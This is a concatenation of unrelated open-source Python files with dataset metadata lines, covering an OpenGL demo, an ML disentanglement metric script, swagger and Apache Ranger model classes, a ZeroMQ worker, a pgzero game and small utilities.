    lightZeroColor = [0.8,1.0,0.8,1.0] #green tinged
    glLightfv(GL_LIGHT0, GL_POSITION, lightZeroPosition)
    glLightfv(GL_LIGHT0, GL_DIFFUSE, lightZeroColor)
    glLightf(GL_LIGHT0, GL_CONSTANT_ATTENUATION, 0.1)
    glLightf(GL_LIGHT0, GL_LINEAR_ATTENUATION, 0.05)
    glEnable(GL_LIGHT0)
    glutDisplayFunc(display)
    # Perspective camera looking at the origin from (0, 0, 10).
    glMatrixMode(GL_PROJECTION)
    gluPerspective(40.,1.,1.,40.)
    glMatrixMode(GL_MODELVIEW)
    gluLookAt(0,0,10,
              0,0,0,
              0,1,0)
    glPushMatrix()
    glRotated(90, -1, -1, 0)
    glutMainLoop()
    return
def display():
    """GLUT display callback: clear buffers and draw a red solid cone."""
    glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)
    glPushMatrix()
    color = [1.0,0.,0.,1.]
    glMaterialfv(GL_FRONT,GL_DIFFUSE,color)
    #glutSolidSphere(2,20,20)
    #glutSolidCylinder(10,20,20,20)
    # Cone: base radius 1, height 4, 200 slices, 100 stacks.
    glutSolidCone(1.0,4.0,200,100)
    #quadratic = gluNewQuadric()
    #BASE = 10
    #TOP = 10
    #HEIGHT = 20
    #SLICES = 20
    #STACKS = 20
    #INNER_RADIUS = 0
    #gluCylinder(quadratic, BASE, TOP, HEIGHT, SLICES, STACKS) # to draw the lateral parts of the cylinder;
    #gluDisk(quadratic, INNER_RADIUS, OUTER_RADIUS, SLICES, LOOPS) # call this two times in the appropriate environment to draw the top and bottom part of the cylinder with INNER_RADIUS=0.
    glPopMatrix()
    # Swap the back buffer to the screen (double-buffered mode).
    glutSwapBuffers()
    return

if __name__ == '__main__': main()
| 2.703125 | 3 |
eval_dci.py | ratschlab/dgp-vae | 5 | 12772874 | """
Script to compute dci score of learned representation.
"""
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
import numpy as np
from absl import flags, app
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from disentanglement_lib.evaluation.metrics import dci
from disentanglement_lib.visualize import visualize_scores
import os
FLAGS = flags.FLAGS

# Command-line configuration for the DCI evaluation run.
flags.DEFINE_string('c_path', '', 'File path for underlying factors c')
flags.DEFINE_string('assign_mat_path', 'data/hirid/assign_mats/hirid_assign_mat.npy', 'Path for assignment matrix')
flags.DEFINE_string('model_name', '', 'Name of model directory to get learned latent code')
flags.DEFINE_enum('data_type_dci', 'dsprites', ['hmnist', 'physionet', 'hirid', 'sprites', 'dsprites', 'smallnorb', 'cars3d', 'shapes3d'], 'Type of data and how to evaluate')
flags.DEFINE_list('score_factors', [], 'Underlying factors to consider in DCI score calculation')
flags.DEFINE_enum('rescaling', 'linear', ['linear', 'standard'], 'Rescaling of ground truth factors')
flags.DEFINE_bool('shuffle', False, 'Whether or not to shuffle evaluation data.')
flags.DEFINE_integer('dci_seed', 42, 'Random seed.')
flags.DEFINE_bool('visualize_score', False, 'Whether or not to visualize score')
flags.DEFINE_bool('save_score', False, 'Whether or not to save calculated score')
def load_z_c(c_path, z_path):
    """Load ground-truth factors ``c`` and latent codes ``z`` from disk.

    *c_path* may point either to an ``.npz`` archive containing a
    ``factors_test`` array or to a plain ``.npy`` array, in which case the
    whole array is used as-is.

    :param c_path: path to the factors file (.npz or .npy).
    :param z_path: path to the latent-code .npy file.
    :return: tuple ``(c, z)`` of numpy arrays.
    """
    try:
        c = np.load(c_path)['factors_test']
    except (KeyError, IndexError):
        # BUG FIX: an .npz archive without the key raises KeyError, which
        # the original (catching only IndexError) let propagate; a plain
        # .npy array raises IndexError for the string index.
        c = np.load(c_path)
    z = np.load(z_path)
    return c, z
def main(argv, model_dir=None):
    """Compute DCI (disentanglement/completeness/informativeness) scores.

    Loads the learned latent code ``z_mean.npy`` from the model directory
    and the corresponding ground-truth factors, fits gradient-boosted
    trees to predict each factor from the latents, and derives the DCI
    metrics from the resulting importance matrix.  Results and plots are
    optionally saved next to the model, controlled by absl flags.

    :param argv: unused absl positional arguments.
    :param model_dir: model directory; falls back to --model_name.
    """
    del argv  # Unused
    if model_dir is None:
        out_dir = FLAGS.model_name
    else:
        out_dir = model_dir
    z_path = '{}/z_mean.npy'.format(out_dir)
    # Resolve the ground-truth factor path per dataset unless given explicitly.
    if FLAGS.c_path == '':
        if FLAGS.data_type_dci != 'hirid':
            c_path = os.path.join(F'/data/{FLAGS.data_type_dci}', F'factors_{FLAGS.data_type_dci}.npz')
        else:
            c_path = os.path.join(F'/data/{FLAGS.data_type_dci}', F'{FLAGS.data_type_dci}.npz')
    else:
        c_path = FLAGS.c_path
    if FLAGS.data_type_dci == "physionet":
        # Use imputed values as ground truth for physionet data
        c, z = load_z_c('{}/imputed.npy'.format(out_dir), z_path)
        c = np.transpose(c, (0,2,1))
    elif FLAGS.data_type_dci == "hirid":
        c = np.load(c_path)['x_test_miss']
        c = np.transpose(c, (0, 2, 1))
        c = c.astype(int)
        z = np.load(z_path)
    else:
        c, z = load_z_c(c_path, z_path)
    # Flatten the time axis: (N, D, T) -> (N*T, D) for both c and z.
    z_shape = z.shape
    c_shape = c.shape
    z_reshape = np.reshape(np.transpose(z, (0,2,1)),(z_shape[0]*z_shape[2],z_shape[1]))
    c_reshape = np.reshape(np.transpose(c, (0,2,1)),(c_shape[0]*c_shape[2],c_shape[1]))
    c_reshape = c_reshape[:z_reshape.shape[0], ...]
    # Experimental physionet rescaling
    if FLAGS.data_type_dci == 'physionet':
        if FLAGS.rescaling == 'linear':
            # linear rescaling
            c_rescale = 10 * c_reshape
            c_reshape = c_rescale.astype(int)
        elif FLAGS.rescaling == 'standard':
            # standardizing
            scaler = StandardScaler()
            c_rescale = scaler.fit_transform(c_reshape)
            c_reshape = (10*c_rescale).astype(int)
        else:
            raise ValueError("Rescaling must be 'linear' or 'standard'")
    # Include all factors in score calculation, if not specified otherwise
    if not FLAGS.score_factors:
        FLAGS.score_factors = np.arange(c_shape[1]).astype(str)
    # Check if ground truth factor doesn't change and remove if is the case
    # (constant factors cannot be predicted and would distort the score).
    mask = np.ones(c_reshape.shape[1], dtype=bool)
    for i in range(c_reshape.shape[1]):
        c_change = np.sum(abs(np.diff(c_reshape[:8000,i])))
        if (not c_change) or (F"{i}" not in FLAGS.score_factors):
            mask[i] = False
    c_reshape = c_reshape[:,mask]
    print(F'C shape: {c_reshape.shape}')
    print(F'Z shape: {z_reshape.shape}')
    print(F'Shuffle: {FLAGS.shuffle}')
    c_train, c_test, z_train, z_test = train_test_split(c_reshape, z_reshape, test_size=0.2, shuffle=FLAGS.shuffle, random_state=FLAGS.dci_seed)
    # Subsample sizes per dataset to keep GBT fitting tractable.
    if FLAGS.data_type_dci == "hirid":
        n_train = 20000
        n_test = 5000
    else:
        n_train = 8000
        n_test = 2000
    importance_matrix, i_train, i_test = dci.compute_importance_gbt(
        z_train[:n_train, :].transpose(),
        c_train[:n_train, :].transpose().astype(int),
        z_test[:n_test, :].transpose(), c_test[:n_test, :].transpose().astype(int))
    # Calculate scores
    d = dci.disentanglement(importance_matrix)
    c = dci.completeness(importance_matrix)
    print(F'D: {d}')
    print(F'C: {c}')
    print(F'I: {i_test}')
    if FLAGS.data_type_dci in ['hirid', 'physionet']:
        # Re-insert zero columns for masked-out factors, then fold feature
        # importances through the assignment matrix to score at the level
        # of clinical variables.
        miss_idxs = np.nonzero(np.invert(mask))[0]
        for idx in miss_idxs:
            importance_matrix = np.insert(importance_matrix,
                                          idx,
                                          0, axis=1)
        assign_mat = np.load(FLAGS.assign_mat_path)
        impt_mat_assign = np.matmul(importance_matrix, assign_mat)
        impt_mat_assign_norm = np.nan_to_num(
            impt_mat_assign / np.sum(impt_mat_assign, axis=0))
        d_assign = dci.disentanglement(impt_mat_assign_norm)
        c_assign = dci.completeness(impt_mat_assign_norm)
        print(F'D assign: {d_assign}')
        print(F'C assign: {c_assign}')
    if FLAGS.save_score:
        if FLAGS.data_type_dci in ['hirid', 'physionet']:
            np.savez(F'{out_dir}/dci_assign_2_{FLAGS.dci_seed}', informativeness_train=i_train, informativeness_test=i_test,
                     disentanglement=d, completeness=c,
                     disentanglement_assign=d_assign, completeness_assign=c_assign)
        else:
            np.savez(F'{out_dir}/dci_{FLAGS.dci_seed}', informativeness_train=i_train, informativeness_test=i_test,
                     disentanglement=d, completeness=c)
    # Visualization
    if FLAGS.visualize_score:
        if FLAGS.data_type_dci == 'hirid':
            # Visualize
            visualize_scores.heat_square(np.transpose(importance_matrix), out_dir,
                                         F"dci_matrix_{FLAGS.dci_seed}",
                                         "feature", "latent dim")
            visualize_scores.heat_square(np.transpose(impt_mat_assign_norm), out_dir,
                                         F"dci_matrix_assign_{FLAGS.dci_seed}",
                                         "feature", "latent_dim")
            # Save importance matrices
            if FLAGS.save_score:
                np.save(F"{out_dir}/impt_matrix_{FLAGS.dci_seed}", importance_matrix)
                np.save(F"{out_dir}/impt_matrix_assign_{FLAGS.dci_seed}", impt_mat_assign_norm)
        else:
            # Visualize
            visualize_scores.heat_square(importance_matrix, out_dir,
                                         F"dci_matrix_{FLAGS.dci_seed}",
                                         "x_axis", "y_axis")
            # Save importance matrices
            np.save(F"{out_dir}/impt_matrix_{FLAGS.dci_seed}", importance_matrix)
    print("Evaluation finished")

if __name__ == '__main__':
    app.run(main)
| 2.234375 | 2 |
jupyterlab_templates/tests/test_git_repos.py | AndersonReyes/jupyterlab_templates | 0 | 12772875 | import json
import os
import requests
def test_server_loaded_notebooks(notebook_server):
    """End-to-end check of the /templates endpoints for a git template.

    Verifies that the server lists the notebook pulled from the example
    git repository and that fetching it returns its name, directory,
    parsable content and absolute path on disk.
    """
    name = "/example-jupyter-notebooks.git/01-MPI-monte-carlo-pi.ipynb"
    resp = requests.get(
        "{}/templates/names".format(notebook_server),
    )
    assert resp.status_code == 200, resp.content
    assert resp.json() == {"example-jupyter-notebooks.git": [{"name": name}]}

    resp2 = requests.get(
        "{}/templates/get".format(notebook_server), params={"template": name}
    )
    # BUG FIX: the failure message previously showed resp.content (the
    # first response) instead of resp2.content.
    assert resp2.status_code == 200, resp2.content
    data = resp2.json()
    assert data["name"] == name
    assert data["dirname"] == "/example-jupyter-notebooks.git"
    assert json.loads(data["content"]) != {}

    # IDIOM: renamed the local from ``dir`` (shadowed the builtin).
    expected_path = os.path.abspath(
        os.path.join(os.path.dirname(__file__), "..", "git-templates", name[1:])
    )
    assert data["path"] == expected_path
| 2.515625 | 3 |
rustici_software_cloud_v2/models/xapi_activity_definition.py | ryanhope2/scormcloud-api-v2-client-python | 0 | 12772876 | # coding: utf-8
"""
SCORM Cloud Rest API
REST API used for SCORM Cloud integrations.
OpenAPI spec version: 2.0
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class XapiActivityDefinition(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, name=None, description=None, type=None, more_info=None, interaction_type=None, correct_responses_pattern=None, choices=None, scale=None, source=None, target=None, steps=None, extensions=None):
"""
XapiActivityDefinition - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'name': 'dict(str, str)',
'description': 'dict(str, str)',
'type': 'str',
'more_info': 'str',
'interaction_type': 'str',
'correct_responses_pattern': 'list[str]',
'choices': 'list[XapiInteractionComponent]',
'scale': 'list[XapiInteractionComponent]',
'source': 'list[XapiInteractionComponent]',
'target': 'list[XapiInteractionComponent]',
'steps': 'list[XapiInteractionComponent]',
'extensions': 'dict(str, object)'
}
self.attribute_map = {
'name': 'name',
'description': 'description',
'type': 'type',
'more_info': 'moreInfo',
'interaction_type': 'interactionType',
'correct_responses_pattern': 'correctResponsesPattern',
'choices': 'choices',
'scale': 'scale',
'source': 'source',
'target': 'target',
'steps': 'steps',
'extensions': 'extensions'
}
self._name = name
self._description = description
self._type = type
self._more_info = more_info
self._interaction_type = interaction_type
self._correct_responses_pattern = correct_responses_pattern
self._choices = choices
self._scale = scale
self._source = source
self._target = target
self._steps = steps
self._extensions = extensions
@property
def name(self):
"""
Gets the name of this XapiActivityDefinition.
:return: The name of this XapiActivityDefinition.
:rtype: dict(str, str)
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this XapiActivityDefinition.
:param name: The name of this XapiActivityDefinition.
:type: dict(str, str)
"""
self._name = name
@property
def description(self):
"""
Gets the description of this XapiActivityDefinition.
:return: The description of this XapiActivityDefinition.
:rtype: dict(str, str)
"""
return self._description
@description.setter
def description(self, description):
"""
Sets the description of this XapiActivityDefinition.
:param description: The description of this XapiActivityDefinition.
:type: dict(str, str)
"""
self._description = description
@property
def type(self):
"""
Gets the type of this XapiActivityDefinition.
:return: The type of this XapiActivityDefinition.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""
Sets the type of this XapiActivityDefinition.
:param type: The type of this XapiActivityDefinition.
:type: str
"""
self._type = type
@property
def more_info(self):
"""
Gets the more_info of this XapiActivityDefinition.
:return: The more_info of this XapiActivityDefinition.
:rtype: str
"""
return self._more_info
@more_info.setter
def more_info(self, more_info):
"""
Sets the more_info of this XapiActivityDefinition.
:param more_info: The more_info of this XapiActivityDefinition.
:type: str
"""
self._more_info = more_info
@property
def interaction_type(self):
"""
Gets the interaction_type of this XapiActivityDefinition.
:return: The interaction_type of this XapiActivityDefinition.
:rtype: str
"""
return self._interaction_type
@interaction_type.setter
def interaction_type(self, interaction_type):
"""
Sets the interaction_type of this XapiActivityDefinition.
:param interaction_type: The interaction_type of this XapiActivityDefinition.
:type: str
"""
self._interaction_type = interaction_type
@property
def correct_responses_pattern(self):
    """Correct-responses pattern of this XapiActivityDefinition (list[str])."""
    return self._correct_responses_pattern

@correct_responses_pattern.setter
def correct_responses_pattern(self, correct_responses_pattern):
    """Replace the correct-responses pattern (list[str])."""
    self._correct_responses_pattern = correct_responses_pattern
@property
def choices(self):
    """Choice components of this XapiActivityDefinition (list[XapiInteractionComponent])."""
    return self._choices

@choices.setter
def choices(self, choices):
    """Replace the choice components (list[XapiInteractionComponent])."""
    self._choices = choices
@property
def scale(self):
    """Scale components of this XapiActivityDefinition (list[XapiInteractionComponent])."""
    return self._scale

@scale.setter
def scale(self, scale):
    """Replace the scale components (list[XapiInteractionComponent])."""
    self._scale = scale
@property
def source(self):
    """Source components of this XapiActivityDefinition (list[XapiInteractionComponent])."""
    return self._source

@source.setter
def source(self, source):
    """Replace the source components (list[XapiInteractionComponent])."""
    self._source = source
@property
def target(self):
    """Target components of this XapiActivityDefinition (list[XapiInteractionComponent])."""
    return self._target

@target.setter
def target(self, target):
    """Replace the target components (list[XapiInteractionComponent])."""
    self._target = target
@property
def steps(self):
    """Step components of this XapiActivityDefinition (list[XapiInteractionComponent])."""
    return self._steps

@steps.setter
def steps(self, steps):
    """Replace the step components (list[XapiInteractionComponent])."""
    self._steps = steps
@property
def extensions(self):
    """Extension map of this XapiActivityDefinition (dict(str, object))."""
    return self._extensions

@extensions.setter
def extensions(self, extensions):
    """Replace the extension map (dict(str, object))."""
    self._extensions = extensions
def to_dict(self):
    """Serialize the model to a plain dict, recursing into nested swagger models.

    Iterates the same ``swagger_types`` keys the generated code used; any
    value exposing ``to_dict()`` (including list/dict members) is converted.
    """
    def _convert(value):
        if isinstance(value, list):
            return [item.to_dict() if hasattr(item, "to_dict") else item
                    for item in value]
        if hasattr(value, "to_dict"):
            return value.to_dict()
        if isinstance(value, dict):
            return {key: val.to_dict() if hasattr(val, "to_dict") else val
                    for key, val in value.items()}
        return value

    return {attr: _convert(getattr(self, attr))
            for attr in self.swagger_types}
def to_str(self):
    """Return a pretty-printed string form of the model's dict representation."""
    state = self.to_dict()
    return pformat(state)
def __repr__(self):
    """Representation used by `print` and `pprint`; delegates to to_str()."""
    return self.to_str()
def __eq__(self, other):
    """Equal when *other* is the same model type with an identical attribute dict."""
    if isinstance(other, XapiActivityDefinition):
        return self.__dict__ == other.__dict__
    return False
def __ne__(self, other):
    """Inverse of __eq__ (kept explicit for Python 2 compatibility of the generator)."""
    return not (self == other)
| 1.703125 | 2 |
rsa/src/crypto/hash.py | rafaelcn/cryptography | 0 | 12772877 | <filename>rsa/src/crypto/hash.py
"""
This file contains hash functions to help in signature verfication.
"""
import hashlib
def hashit(data):
    """Return the 32-byte (256-bit) SHA3-256 digest of *data* (a bytes-like object)."""
    hasher = hashlib.sha3_256(data)
    return hasher.digest()
| 2.4375 | 2 |
setup.py | emcek/ufc | 0 | 12772878 | import io
from os.path import abspath, dirname, join
from setuptools import setup, find_packages
from dcspy.dcs_g13 import __version__
# Resolve bundled files (README, requirements) relative to this setup.py so
# builds work regardless of the current working directory.
here = abspath(dirname(__file__))
# The PyPI long description is the README verbatim (markdown, see
# long_description_content_type below).
with io.open(join(here, 'README.md'), encoding='utf-8') as f:
    long_description = f.read()
# Runtime dependencies live in requirements.txt, one requirement per line.
with io.open(join(here, 'requirements.txt'), encoding='utf-8') as f:
    requires = f.read().splitlines()

setup(name='dcspy',  # Required
      version=__version__,  # Required
      description='Software for integrating DCS: F/A-18C, F-16C and Ka-50 with Logitech G13',  # Required
      long_description=long_description,  # Optional
      long_description_content_type='text/markdown',  # Optional (see note above)
      url='https://github.com/emcek/dcspy',  # Optional
      author='<NAME>',  # Optional
      license='MIT License',
      # Installs a `dcs_g13` console command mapping to dcspy.dcs_g13:run.
      entry_points={'console_scripts': ['dcs_g13 = dcspy.dcs_g13:run']},
      data_files=[('dcspy_data', ['images/dcspy.ico'])],
      classifiers=['Development Status :: 4 - Beta',
                   'Environment :: Console',
                   'License :: OSI Approved :: MIT License',
                   'Programming Language :: Python :: 3.6',
                   'Programming Language :: Python :: 3.7',
                   'Programming Language :: Python :: 3.8',
                   'Operating System :: Microsoft :: Windows',
                   'Operating System :: Microsoft :: Windows :: Windows 10',
                   'Topic :: Games/Entertainment',
                   'Topic :: Games/Entertainment :: Simulation',
                   'Topic :: Software Development :: Libraries :: Python Modules',
                   'Topic :: System :: Hardware',
                   'Topic :: Utilities'],
      keywords='logitech logitech-sdk logitech-keyboards logitech-gaming logitech-gaming-keyboard dcs-world dcs g13',
      # packages=find_packages(exclude=['tests']), # Required
      packages=find_packages(),  # Required
      install_requires=requires,  # Optional
      platforms=['win32', 'nt', 'Windows'],
      # extras_require={'testing': ['pytest']},
      project_urls={'Bug Reports': 'https://github.com/emcek/dcspy/issues',
                    'Source': 'https://github.com/emcek/dcspy'})
| 1.359375 | 1 |
examples/pythonic++_list.py | HighCWu/tpythonpp | 0 | 12772879 | with c++:
@module( mycppmodule )
def foo(a, o):
std::cout << a << std::endl
a.append( "world" )
a.append( std::string("mystdstring") )
a.append( o )
a.append( 1 )
a.append( 9.5 )
return None
import mycppmodule
x = ['hello']
b = 'bar'
mycppmodule.foo( x, b )
print( x )
| 2.953125 | 3 |
aiozmq-guide/rrworker-aio.py | r-marques/aiozmq-guide | 4 | 12772880 | <filename>aiozmq-guide/rrworker-aio.py<gh_stars>1-10
import asyncio
import aiozmq
import zmq
async def go():
    """
    Request-reply worker.

    Connects a REP socket to tcp://localhost:5560, expects "Hello" from the
    client and replies with "World", forever.
    """
    # Rewritten from the legacy @asyncio.coroutine / `yield from` form, which
    # was deprecated in Python 3.8 and removed in 3.11; `async def` behaves
    # identically for run_until_complete().
    socket = await aiozmq.create_zmq_stream(zmq.REP, connect='tcp://localhost:5560')
    while True:
        message = await socket.read()
        print('Received request: {}'.format(*message))
        socket.write([b'World'])
if __name__ == "__main__":
    print('Starting worker...')
    # Runs the worker until interrupted. NOTE(review): get_event_loop() outside
    # a running loop is deprecated since Python 3.10 -- confirm the target
    # Python version before modernizing to asyncio.run().
    asyncio.get_event_loop().run_until_complete(go())
| 2.890625 | 3 |
movie/merge_results.py | andytorrestb/piv_routines | 1 | 12772881 | import os
import save_figures as fig
from data_reader import DataReader
def merge_results(path):
    """Merge left/center/right PIV result files found in *path* into one
    'result.<name>' file per input, with a '#'-prefixed header line.

    Parameters
    ----------
    path : str
        Directory containing 'left', 'center' and 'right' subdirectories;
        must end with a path separator (original calling convention).
    """
    # Local import: pd.concat replaces DataFrame.append, which was deprecated
    # and removed in pandas 2.0. The debug type-prints were dropped.
    import pandas as pd

    dr = DataReader()
    for file_name in sorted(os.listdir(path + 'left')):
        l_img = dr.load_pandas(path + 'left/' + file_name)
        c_img = dr.load_pandas(path + 'center/' + file_name)
        r_img = dr.load_pandas(path + 'right/' + file_name)
        img = pd.concat([l_img, c_img, r_img])
        dump_name = 'dump.' + file_name
        img.to_csv(
            path + dump_name,
            sep=' ',
            header=True,
            quotechar=' ',
            index=False)
        # Re-write the dump with its header line commented out ('# ').
        result_name = 'result.' + file_name
        with open(path + dump_name, 'r') as dump:
            header = "# " + dump.readline()
            body = dump.read()
        with open(path + result_name, 'w') as result:
            result.write(header)
            result.write(body)
| 2.78125 | 3 |
game03/satelliti.py | PythonBiellaGroup/LearningPythonWithGames | 2 | 12772882 | <reponame>PythonBiellaGroup/LearningPythonWithGames
import pgzrun
from random import randint
from time import time
TITLE = "🐍🐍 Connetti i satelliti 🐍🐍"
WIDTH = 800
HEIGHT = 600

satelliti = []  # satellite actors, in the order they must be clicked
linee = []  # lines drawn so far, as (start_pos, end_pos) tuples
indice_prossimo_satellite = 0  # index of the next satellite the player must click
tempo_iniziale = 0  # timestamp (time.time()) when the round started
tempo_totale = 0  # elapsed time currently shown on screen
tempo_finale = 0  # NOTE(review): never updated anywhere in this file
NUM_SATELLITI = 8
def crea_satelliti():
    """Create NUM_SATELLITI satellite actors at random positions and start the clock."""
    global tempo_iniziale
    for _ in range(NUM_SATELLITI):
        sat = Actor("satellite")
        # Random position, kept 40 px away from every window border.
        sat.pos = randint(40, WIDTH - 40), randint(40, HEIGHT - 40)
        satelliti.append(sat)
    tempo_iniziale = time()
def draw():
    """Pygame Zero draw hook: background, numbered satellites, lines, elapsed time."""
    global tempo_totale
    screen.blit("sfondo", (0, 0))
    # Satellites are labelled 1..N in the order they must be clicked.
    for numero, satellite in enumerate(satelliti, start=1):
        screen.draw.text(str(numero), (satellite.pos[0], satellite.pos[1] + 20))
        satellite.draw()
    for inizio, fine in linee:
        # Connection lines are drawn in white.
        screen.draw.line(inizio, fine, (255, 255, 255))
    if indice_prossimo_satellite < NUM_SATELLITI:
        # Game still running: keep the clock ticking.
        tempo_totale = time() - tempo_iniziale
    # Whether running or finished, show the (frozen, if finished) elapsed time.
    screen.draw.text(str(round(tempo_totale, 2)), (10, 10), fontsize=30)
def update():
    """Pygame Zero per-frame hook; this game is event-driven, so nothing to do."""
    pass
def on_mouse_down(pos):
    """Handle a click: extend the chain if the correct satellite was hit,
    otherwise reset the round with a fresh set of satellites."""
    global indice_prossimo_satellite, linee
    if indice_prossimo_satellite >= NUM_SATELLITI:
        # All satellites already connected; ignore further clicks.
        return
    if satelliti[indice_prossimo_satellite].collidepoint(pos):
        if indice_prossimo_satellite:
            # Each line is a tuple (previous satellite pos, clicked satellite pos);
            # each pos is itself an (x, y) tuple.
            linee.append((satelliti[indice_prossimo_satellite - 1].pos,
                          satelliti[indice_prossimo_satellite].pos))
        indice_prossimo_satellite += 1
    else:
        # Wrong satellite: restart from scratch.
        linee = []
        indice_prossimo_satellite = 0
        crea_satelliti()
pgzrun.go() | 3.65625 | 4 |
matriz = []
valor = []
somaPar = somaColuna3 = 0
# None until the first value of row index 1 is seen: the original initialized
# this to 0, which reported a wrong maximum when the second row was all-negative.
maiorLinha2 = None

# Read a 3x3 matrix, one value at a time.
for i in range(0, 3):
    for j in range(0, 3):
        valor.append(int(input(f'Digite um valor para [{i}, {j}]: ')))
    matriz.append(valor[:])
    valor.clear()
print('-=' * 30)
for i in range(0, 3):
    for j in range(0, 3):
        print(f'[{matriz[i][j]:^5}]', end='')  # print the 3x3 matrix
        if matriz[i][j] % 2 == 0:  # accumulate even values
            somaPar += matriz[i][j]
        if j == 2:  # accumulate the third column
            somaColuna3 += matriz[i][j]
        if i == 1:  # track the largest value of the second row
            if maiorLinha2 is None or matriz[i][j] > maiorLinha2:
                maiorLinha2 = matriz[i][j]
    print()
print('-=' * 30)
print(f'Soma de todos os valores pares é {somaPar}.')
print(f'Soma dos valores da terceira coluna é {somaColuna3}.')
print(f'O maior valor da segunda linha é {maiorLinha2}.')
| 3.8125 | 4 |
mysite/benthic_photosynthesis_measurement.py | EggsWithCheese/WSU-PAL-PPC | 0 | 12772884 | '''
Created on Jun 17, 2015
@author: cdleong
'''
from photosynthesis_measurement import PhotosynthesisMeasurement
class BenthicPhotosynthesisMeasurement(PhotosynthesisMeasurement):
    '''
    Photosynthesis measurement at a given depth, extended with an "ik"
    parameter (presumably the light-saturation parameter Ik -- see the Kalff
    reference in the comments below; confirm against the parent class docs).
    '''
    # Arbitrary validity bounds one order of magnitude beyond the typical
    # range. NOTE(review): currently unused -- see the TODO in set_ik().
    MAX_VALID_IK = 10.0 #Arbitrary value one order of magnitude greater than typical. According to Kalff's Limnology, page 333, Ik typically falls between 0.14 and 0.72
    MIN_VALID_IK = 0.01 #Arbitrary value one order of magnitude less than typical. According to Kalff's Limnology, page 333, Ik typically falls between 0.14 and 0.72
    # NOTE(review): this class attribute is immediately shadowed by the `ik`
    # property defined at the bottom of the class.
    ik = 0.0

    def __init__(self, depth, pmax, ik):
        # depth and pmax are stored by the parent; ik is set via the setter.
        super(BenthicPhotosynthesisMeasurement, self).__init__(depth, pmax)
        self.set_ik(ik)

    #GETTERS
    def get_depth(self):
        return PhotosynthesisMeasurement.get_depth(self)

    def get_pmax(self):
        return PhotosynthesisMeasurement.get_pmax(self)

    def get_ik(self):
        # `__ik` is name-mangled to _BenthicPhotosynthesisMeasurement__ik.
        return self.__ik

    #SETTERS
    def set_depth(self, value):
        #TODO: validate
        return PhotosynthesisMeasurement.set_depth(self, value)

    def set_pmax(self, value):
        #TODO: validate
        return PhotosynthesisMeasurement.set_pmax(self, value)

    def set_ik(self, value):
        #TODO: validate (MIN_VALID_IK/MAX_VALID_IK above are intended bounds)
        self.__ik = value

    def del_ik(self):
        del self.__ik

    def del_depth(self):
        return PhotosynthesisMeasurement.del_depth(self)

    def del_pmax(self):
        return PhotosynthesisMeasurement.del_pmax(self)

    #autogenerated by PyDev.
    ik = property(get_ik, set_ik, del_ik, "ik's docstring")
def main():
    """Smoke-test entry point."""
    # Rewritten from the Python 2 `print` statement so the module also parses
    # under Python 3; output is identical.
    print("hello world")


if __name__ == "__main__":
    main()
intg/src/main/python/apache_ranger/model/ranger_policy.py | Eroschang/ranger | 11 | 12772885 | #!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from apache_ranger.model.ranger_base import RangerBase
class RangerPolicyResource:
    """One resource entry of a Ranger policy: matched values plus exclude/recursive flags."""

    def __init__(self, values=None, isExcludes=None, isRecursive=None):
        # Mutable/boolean fields default per instance; None means "not given".
        self.values = [] if values is None else values
        self.isExcludes = False if isExcludes is None else isExcludes
        self.isRecursive = False if isRecursive is None else isRecursive

    def __repr__(self):
        # JSON view of the instance state (stable key order for readability).
        return json.dumps(self, default=lambda x: x.__dict__, sort_keys=True, indent=4)
class RangerPolicyItemCondition:
    """A named condition attached to a policy item (e.g. an IP-range restriction)."""

    def __init__(self, type=None, values=None):
        self.type = type
        self.values = [] if values is None else values

    def __repr__(self):
        return json.dumps(self, default=lambda x: x.__dict__, sort_keys=True, indent=4)
class RangerPolicyItem:
    """One allow/deny entry of a policy: who (users/groups/roles) gets which accesses."""

    def __init__(self, accesses=None, users=None, groups=None, roles=None, conditions=None, delegateAdmin=None):
        # Every collection gets a fresh per-instance list; delegateAdmin defaults to False.
        self.accesses = [] if accesses is None else accesses
        self.users = [] if users is None else users
        self.groups = [] if groups is None else groups
        self.roles = [] if roles is None else roles
        self.conditions = [] if conditions is None else conditions
        self.delegateAdmin = False if delegateAdmin is None else delegateAdmin

    def __repr__(self):
        return json.dumps(self, default=lambda x: x.__dict__, sort_keys=True, indent=4)
class RangerPolicyItemAccess:
    """A single access type (e.g. 'read') and whether it is allowed (default True)."""

    def __init__(self, type=None, isAllowed=None):
        self.type = type
        self.isAllowed = True if isAllowed is None else isAllowed

    def __repr__(self):
        return json.dumps(self, default=lambda x: x.__dict__, sort_keys=True, indent=4)
class RangerPolicyItemDataMaskInfo:
    """Masking configuration: mask type plus optional condition and value expressions."""

    def __init__(self, dataMaskType=None, conditionExpr=None, valueExpr=None):
        self.dataMaskType = dataMaskType
        self.conditionExpr = conditionExpr
        self.valueExpr = valueExpr

    def __repr__(self):
        return json.dumps(self, default=lambda x: x.__dict__, sort_keys=True, indent=4)
class RangerDataMaskPolicyItem(RangerPolicyItem):
    """Policy item that additionally carries data-mask information."""

    def __init__(self, dataMaskInfo=None, accesses=None, users=None, groups=None, roles=None, conditions=None, delegateAdmin=None):
        super().__init__(accesses, users, groups, roles, conditions, delegateAdmin)
        # Missing mask info defaults to an empty RangerPolicyItemDataMaskInfo.
        self.dataMaskInfo = RangerPolicyItemDataMaskInfo() if dataMaskInfo is None else dataMaskInfo

    def __repr__(self):
        return json.dumps(self, default=lambda x: x.__dict__, sort_keys=True, indent=4)
